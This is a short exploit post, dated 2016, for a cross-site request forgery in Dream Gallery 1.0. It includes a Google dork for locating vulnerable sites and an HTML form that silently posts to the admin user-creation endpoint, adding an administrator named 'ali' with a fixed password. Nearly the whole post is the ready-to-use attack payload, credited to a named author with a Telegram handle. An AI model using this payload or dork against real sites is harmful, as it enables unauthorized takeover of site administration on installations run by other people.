Dream Gallery 1.0 Cross Site Request Forgery
Posted on 07 June 2016
<!-- # Exploit Title: Dream Gallery - CSRF Add Admin Exploit # Google Dork: "Design by Rafael Clares" # Date: 2016/06/03 # Exploit Author: Ali Ghanbari # Vendor Homepage: http://phpstaff.com.br/ # Version: 1.0 #Exploit: --> <html> <body> <form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir"> <input type="hidden" name="user_login" value="ali"> <input type="hidden" name="user_password" type="hidden" value="123456" > <input type="hidden" name="user_email" value=""> <input type="submit" value="create"> </form> </body> </html> <!-- ######################### [+]Exploit by: Ali Ghanbari [+]My Telegram :@Exploiter007 -->
